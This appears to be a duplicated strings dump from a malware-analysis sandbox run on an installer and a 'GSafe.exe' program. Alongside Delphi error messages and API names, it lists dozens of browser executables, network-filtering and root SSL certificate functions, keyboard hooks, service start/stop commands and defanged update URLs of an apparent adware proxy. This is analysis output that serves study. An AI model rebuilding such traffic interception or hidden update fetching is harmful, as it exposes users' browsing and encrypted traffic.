Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count#No OnGetItem event handler assigned"PageControl must first be assigned#No context-sensitive help installed
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count#No OnGetItem event handler assigned"PageControl must first be assigned#No context-sensitive help installed
No help found for %s
No help found for %s
Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d
Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d
Unable to insert a line Clipboard does not support Icons
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity.There is no default printer currently selected/Menu '%s' is already being used by another form
Text exceeds memo capacity.There is no default printer currently selected/Menu '%s' is already being used by another form
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s property out of range
%s property out of range
Unsupported clipboard format
Unsupported clipboard format
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and = 0 and
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and = 0 and
''%s'' is not a valid date#''%s'' is not a valid date and time#''%s'' is not a valid integer value
''%s'' is not a valid date#''%s'' is not a valid date and time#''%s'' is not a valid integer value
''%s'' is not a valid time
''%s'' is not a valid time
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
%s on line %d
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group#A component named %s already exists%String list does not allow duplicates
%s expected$%s not in a class registration group#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
Line too long List capacity out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid count (%d)
Invalid destination index (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)
A class named %s already exists%List does not allow duplicates ($0%x)
Object lock not owned(Monitor support function not initialized
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
('%s' is not a valid floating point value
('%s' is not a valid floating point value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
n%USERPROFILE%
n%USERPROFILE%
r%SYSTEMROOT%
r%SYSTEMROOT%
5.50.4807.2300
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
Datos de programa%Configuraci
51.1052.0.0
51.1052.0.0
setup.tmp_632_rwx_00DA6000_00001000:
Invalid variant operation
Invalid variant operation
Invalid pointer operation
Invalid pointer operation
Portable Network Graphics
Portable Network Graphics
GSafe.exe_1160:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s
Proportional
Proportional
MAPI32.DLL
MAPI32.DLL
TURLAction
TURLAction
TURLActionp
TURLActionp
HelpKeywordD
HelpKeywordD
TURLDownloadStatus
TURLDownloadStatus
dsBeginSyncOperation
dsBeginSyncOperation
dsEndSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
dsFilterReportMIMEType
TDownLoadURL
TDownLoadURL
TDownLoadURLT
TDownLoadURLT
URLMON.DLL
URLMON.DLL
URLDownloadToFileA
URLDownloadToFileA
OnKeyDown
OnKeyDown
OnKeyPress\
OnKeyPress\
OnKeyUp
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword(
HelpKeyword(
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
Uhx%D
Uhx%D
Uh[%D
Uh[%D
AutoHotkeysX/D
AutoHotkeysX/D
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreviewL6D
KeyPreviewL6D
WindowState
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
Password
Password
OnExecute
OnExecute
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
chrome.exe
chrome.exe
safari.exe
safari.exe
opera.exe
opera.exe
netscape.exe
netscape.exe
torch.exe
torch.exe
seamonkey.exe
seamonkey.exe
k-meleon.exe
k-meleon.exe
konqueror.exe
konqueror.exe
maxthon.exe
maxthon.exe
flock.exe
flock.exe
lunascape.exe
lunascape.exe
amaya.exe
amaya.exe
midori.exe
midori.exe
kidzui.exe
kidzui.exe
rockmelt.exe
rockmelt.exe
sbrowser.exe
sbrowser.exe
slimbrowser.exe
slimbrowser.exe
kidrocket.exe
kidrocket.exe
epic.exe
epic.exe
ironbrowser.exe
ironbrowser.exe
comodo.exe
comodo.exe
comododragon.exe
comododragon.exe
crazybrowser.exe
crazybrowser.exe
arora.exe
arora.exe
shenzbrowser.exe
shenzbrowser.exe
enigmabrowser.exe
enigmabrowser.exe
avant.exe
avant.exe
avantbrowser.exe
avantbrowser.exe
orca.exe
orca.exe
xbbrowser.exe
xbbrowser.exe
xbrowser.exe
xbrowser.exe
sleipnir.exe
sleipnir.exe
spacetime.exe
spacetime.exe
3dbrowse.exe
3dbrowse.exe
bitty.exe
bitty.exe
java.exe
java.exe
grail.exe
grail.exe
lynx.exe
lynx.exe
twb.exe
twb.exe
tt.exe
tt.exe
pinkbrowser.exe
pinkbrowser.exe
nuke.exe
nuke.exe
acoo.exe
acoo.exe
palemoon.exe
palemoon.exe
slimboat.exe
slimboat.exe
dooble.exe
dooble.exe
menubox.exe
menubox.exe
chromium.exe
chromium.exe
ultrabrowser.exe
ultrabrowser.exe
zac.exe
zac.exe
kylo.exe
kylo.exe
morequick.exe
morequick.exe
wyzo.exe
wyzo.exe
xombrero.exe
xombrero.exe
qupzilla.exe
qupzilla.exe
cometbird.exe
cometbird.exe
qtweb.exe
qtweb.exe
deepnet.exe
deepnet.exe
xtravo.exe
xtravo.exe
smartbro.exe
smartbro.exe
jumpto.exe
jumpto.exe
weblock4kids.exe
weblock4kids.exe
weblock.exe
weblock.exe
comodoice.exe
comodoice.exe
srwareiron.exe
srwareiron.exe
srware.exe
srware.exe
coolnovo.exe
coolnovo.exe
cool.exe
cool.exe
qup.exe
qup.exe
browseme.exe
browseme.exe
swiftfox.exe
swiftfox.exe
omniweb.exe
omniweb.exe
omni.exe
omni.exe
spark.exe
spark.exe
bobrowser.exe
bobrowser.exe
crossbrowser.exe
crossbrowser.exe
crossbrowse.exe
crossbrowse.exe
content-security-policy-report-only
content-security-policy-report-only
GSafe Intermediate Certificate
GSafe Intermediate Certificate
127.0.0.1
127.0.0.1
ServiceExecute
ServiceExecute
\GS_CheckUpdate.txt
\GS_CheckUpdate.txt
\gs_update.exe
\gs_update.exe
hXXp://VVV.gencolabsllc.com/services/
hXXp://VVV.gencolabsllc.com/services/
_rules.php
_rules.php
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
hXXp://VVV.gencolabsllc.com/services/update.php?affid=
&key=
&key=
\GS_RuleList.txt
\GS_RuleList.txt
[E] ProductKey :
[E] ProductKey :
[N] ProductKey :
[N] ProductKey :
cmd.exe /c net start GSafe
cmd.exe /c net start GSafe
cmd.exe /c net stop GSafe
cmd.exe /c net stop GSafe
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
ReportEventA
ReportEventA
RegFlushKey
RegFlushKey
RegCreateKeyExA
RegCreateKeyExA
WinExec
WinExec
GetCPInfo
GetCPInfo
version.dll
version.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
wsock32.dll
wsock32.dll
nfapi.dll
nfapi.dll
nf_setTCPTimeout
nf_setTCPTimeout
nf_udpPostReceive
nf_udpPostReceive
nf_udpPostSend
nf_udpPostSend
nf_tcpClose
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpPostSend
nf_tcpSetConnectionState
nf_tcpSetConnectionState
psapi.dll
psapi.dll
ProtocolFilters.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
pfc_setRootSSLCertSubject
ws2_32.dll
ws2_32.dll
5l6O6W6
5l6O6W6
=#=0=5=;=
=#=0=5=;=
3 3$3(3,303
3 3$3(3,303
5 5$5(5,5:5
5 5$5(5,5:5
8 8$8(8,8
8 8$8(8,8
9"9&9.949
9"9&9.949
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
KWindows
KWindows
UrlMon
UrlMon
No help keyword specified.
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Unable to load %s"Unable to find a Table of Contents
Alt Clipboard does not support Icons
Alt Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Service failed on %s: %s
Unsupported clipboard format
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
!'%s' is not a valid integer value
I/O error %d
I/O error %d
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
setup.tmp_632_rwx_10001000_00026000:
%UUUU
%UUUU
t.PPPP
t.PPPP